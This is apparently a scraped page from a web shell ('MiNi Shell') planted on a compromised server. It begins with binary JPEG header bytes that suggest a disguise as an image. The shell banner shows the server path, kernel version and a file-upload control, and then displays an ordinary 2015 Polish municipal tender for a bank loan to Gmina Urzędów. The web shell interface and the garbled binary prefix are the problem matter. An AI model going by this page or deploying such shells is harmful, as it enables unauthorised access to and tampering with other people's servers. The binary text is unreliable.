JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151105/297900-N-2015.html

<p class="kh_header"><b>Urzędów: Udzielenie i obsługa kredytu długoterminowego w wysokości 2 360 580,00 złotych na sfinansowanie deficytu budżetu  oraz spłatę wcześniej zaciągniętych kredytów i pożyczek</b><br>
<b>Numer ogłoszenia: 297900 - 2015; data zamieszczenia: 05.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Urzędów , ul. Rynek 26, 23-250 Urzędów, woj. lubelskie, tel. 81 822 50 42, faks 81 822 51 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugurzedow.bip.lubelskie.pl   zakładka ogłoszenia, zakładka przetargi</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie i obsługa kredytu długoterminowego w wysokości 2 360 580,00 złotych na sfinansowanie deficytu budżetu  oraz spłatę wcześniej zaciągniętych kredytów i pożyczek.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest  udzielenie i obsługa  kredytu długoterminowego  wysokości  2 360 580,00 złotych,  (słownie: dwa miliony  trzysta sześćdziesiąt tysięcy pięćset osiemdziesiąt złotych) z przeznaczeniem na sfinansowanie deficytu budżetu oraz spłatę wcześniej zaciągniętych kredytów i pożyczek.
Szczegółowe warunki udzielenia i spłaty kredytu:
1)	udostępnienie kredytu nastąpi na każde żądanie zamawiającego we wskazanej przez niego wysokości i w formie przelewu na rachunek bankowy gminy Urzędów - najpóźniej  do 7 dni  kalendarzowych  od dnia złożenia zapotrzebowania przez Zamawiającego. Ostateczny termin wykorzystania  kredytu nie później niż do końca 2015r. 
( Uwaga: do oferty należy przyjąć termin udostępnienia kredytu ( I transzy) do dnia 07.12.2015r. i traktować jedynie jako hipotetyczną datę wypłaty środków z kredytu),

2)	kredyt zostanie udzielony  w walucie polskiej,

3)	karencja spłaty kredytu do 30.04.2016r., termin spłaty do 30.09.2025roku, 

4)	spłata odsetek w okresach miesięcznych na podstawie zawiadomienia przez bank,

5)	odsetki od kredytu naliczane będą od faktycznie wykorzystanej kwoty kredytu, w okresach miesięcznych i płatne w okresach miesięcznych do dnia 15-go następnego miesiąca, począwszy od grudnia 2015r.

6)	dla wyznaczenia wysokości odsetek przyjmuje się rok równy 365 dni oraz rzeczywistą liczbę dni w miesiącu,

7)	w przypadku spłaty kredytu we wcześniejszym terminie, odsetki będą naliczane do dnia spłaty,

8)	zamawiający zastrzega sobie prawo do wcześniejszej spłaty kredytu w całości lub części  jak i nie wykorzystania kredytu w całości,  w takim przypadku bank nie będzie naliczał dodatkowych opłat od kwoty kredytu spłaconego przed terminem, jak i nie wykorzystanego, oraz innych kosztów rekompensujących, jak również  możliwość wydłużenia okresu spłaty kredytu ( dłużej niż przewidziany termin 30.09.2025r.),  poprzez aneks do umowy o kredyt, bez naliczania dodatkowych opłat,

9)	oprocentowanie kredytu będzie zmienne,

10)	stopa bazowa do ustalenia oprocentowania:
- do oferty: według stawki WIBOR 3M na dzień 12.10.2015r. (tj. 1,73). UWAGA: Do kalkulacji ceny należy przyjąć rzeczywistą liczbę dni w poszczególnych latach,
- do umowy:  oprocentowanie kredytu w dniu zawarcia umowy, ustala się na podstawie stawki bazowej WIBOR dla depozytów 3M , wyliczone jako średnia z miesiąca poprzedzającego miesiąc, w którym zostanie zawarta umowa powiększone  o marżę banku ( ma zastosowanie do końca miesiąca kalendarzowego, w którym zostanie zawarta umowa).
Przy naliczaniu odsetek za każdy kolejny okres odsetkowy wykonawca  stosuje stawkę WIBOR 3M, wyliczoną  jako średnia z miesiąca poprzedzającego miesiąc obrachunkowy, powiększone o marżę wykonawcy. Czyli np. odsetki od 1 grudnia - średnia  stawka WIBOR 3M za miesiąc listopad. Zmiana oprocentowania następuje każdego pierwszego dnia roboczego następnego miesiąca.
Marża będzie stała przez cały okres kredytowania,
11)	liczba rat kapitałowych   - 39 , w tym 1 rata ( 20 000 zł),  22 raty  (26 000 zł),  1 rata (50 000zł),
 3 raty (60 000zł),  11 rat (128 000 zł), 1 rata wyrównująca ( 130 580 zł).

raty kapitałowe :
płatne  w ostatnim dniu roboczym miesiąca kończącego kalendarzowy miesiąc, j.n.:
kwota  20 000 złotych                                maj  2016 rok
kwota  26 000 złotych                                sierpień 2016 rok
kwota  26 000 złotych                                luty  2017 rok
kwota  26 000 złotych                                maj 2017 rok
kwota 26 000 złotych                                czerwiec 2017 rok
kwota 26 000 złotych                                sierpień 2017 rok
kwota 26 000 złotych                                luty 2018 rok
kwota 26 000 złotych                                maj 2018 rok
kwota 26 000 złotych                                czerwiec  2018 rok
kwota  26 000 złotych                               październik 2018 rok
kwota  26 000 złotych                               luty 2019 rok
kwota  26 000 złotych                               maj 2019 rok
kwota  26 000 złotych                               lipiec 2019 rok
kwota  26 000 złotych                              listopad 2019 rok
kwota  26 000 złotych                              luty 2020 rok
kwota  26 000 złotych                              maj  2020 rok
kwota  26 000 złotych                              lipiec 2020 rok
kwota  26 000 złotych                              listopad 2020 rok
kwota  26 000 złotych                              luty 2021 rok
kwota  26 000 złotych                              maj 2021 rok
kwota  26 000 złotych                              lipiec 2021 rok
kwota  26 000 złotych                              wrzesień 2021 rok
kwota  26 000 złotych                              listopad 2021 rok
kwota  50 000 złotych                              maj 2022 rok
kwota  60 000 złotych                              sierpień 2022 rok
kwota  60 000 złotych                              październik 2022 rok
kwota  60 000 złotych                              listopad  2022 rok
kwota 128 000 złotych                             luty 2023 rok
kwota 128 000 złotych                             marzec  2023 rok
kwota 128 000 złotych                             czerwiec 2023 rok
kwota 128 000 złotych                             wrzesień  2023 rok
kwota 128 000 złotych                             luty 2024 rok
kwota 128 000 złotych                             marzec 2024 rok
kwota 128 000 złotych                             czerwiec  2024 rok
kwota 128 000 złotych                             wrzesień 2024 rok
kwota 128 000 złotych                             luty  2025 rok
kwota  128 000 złotych                            marzec 2025 rok	
kwota 128 000 złotych                             czerwiec  2025 rok
kwota  130 580 złotych                            wrzesień 2025 rok	


Wykonawca (bank) w oparciu  o wyżej wyznaczone raty spłat sporządzi prognozowany harmonogram spłat kapitału,  odsetek , ewentualną marżę i dołączy do oferty.
12) zabezpieczeniem kredytu będzie weksel in blanco wraz z deklaracją wekslową. Zabezpieczenie może być realizowane w przypadku zwłoki w spłacie rat kapitałowych  lub odsetek,  przekraczającej 30 dni.
13) Gmina Urzędów wyraża zgodę na pisemne złożenie oświadczenia o poddaniu się egzekucji w świetle przepisów art. 97 ust. 1 i 2 Prawo bankowe ( tekst jedn.  Dz.U. z 2015 poz. 128 ze zm.) 
Informacje niezbędne do przygotowania oferty (tj. budżet, sprawozdania , opinie RIO itp. ) znajdują się  pod niniejszym adresem - Biuletyn Informacji Publicznej Urzędu Gminy Urzędów -  adres www.ugurzedow.bip.lubelskie.pl, zakładka inne dokumenty, zakładka dokumenty do procedur kredytowych - data wytworzenia 05.11.2015r.).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełnienia warunku dotyczącego posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, wykonawca przedłoży zezwolenie na utworzenie i rozpoczęcie przez bank  działalności wynikające z ustawy z dnia 29 sierpnia 1997r. Prawo bankowe ( tekst jednolity Dz.U. z 2015r. poz. 128 z późn. zm.) dla banków utworzonych od 1998r.( zezwolenie uprawniające do wykonywania czynności bankowych),  lub równorzędne  dokumenty dla banków utworzonych przed 1998r. W przypadku gdy Wykonawca na podstawie odrębnych przepisów nie jest zobowiązany do posiadania ww. zezwolenia do dokonywania czynności bankowych, za spełnienie warunku uważać się będzie przedstawienie odpowiedniego oświadczenia Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Warunek dotyczący posiadania wiedzy i doświadczenia zostanie oceniony na podstawie oświadczenia stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Warunek dotyczący dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,  zostanie oceniony na podstawie oświadczenia stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Warunek dotyczący dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia,  zostanie oceniony na podstawie oświadczenia stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Warunek dotyczący sytuacji ekonomicznej i finansowej,  zostanie oceniony na podstawie oświadczenia stanowiącego załącznik nr  2 do specyfikacji istotnych warunków zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - zał. nr 1 
2) Dokumenty potwierdzające posiadanie uprawnień,  pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.
3) Formularz cenowy - wypełniony i podpisany przez wykonawcę - zał. nr 1a</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - czas udostepnienia kredytu od dnia złożenia zapotrzebowania - 2</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa w sprawie realizacji zamówienia publicznego zawarta zostanie z uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji istotnych warunków zamówienia oraz danych zawartych w ofercie.

2. Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza  przed podpisaniem umowy przekaże Zamawiającemu projekt umowy  uwzględniający zapisy siwz i złożonej oferty.

3. Zamawiający zastrzega sobie prawo  do zmian szczegółowych zapisów projektu umowy przedłożonego przez wykonawcę. Zmiany te  mogą dotyczyć w szczególności  okoliczności których nie można było przewidzieć w chwili opracowania dokumentów przetargowych jak  i w chwili wyboru najkorzystniejszej oferty, lub zmiany te są korzystne dla zamawiającego, a wykonawca wyrazi na nie zgodę. Zmiany nie mogą dotyczyć  zobowiązań wykonawcy zawartych w ofercie , które były oceniane w toku postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugurzedow.bip.lubelskie.pl  zakładka ogłoszenia, zakładka przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Urzędów, ul. Rynek 26, 23-250 Urzędów, pokój nr 12. Siwz jest nieodpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.11.2015 godzina 11:00, miejsce: Urząd Gminy Urzędów, ul. Rynek 26, 23-250 Urzędów, pokój nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 12.12.2015.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com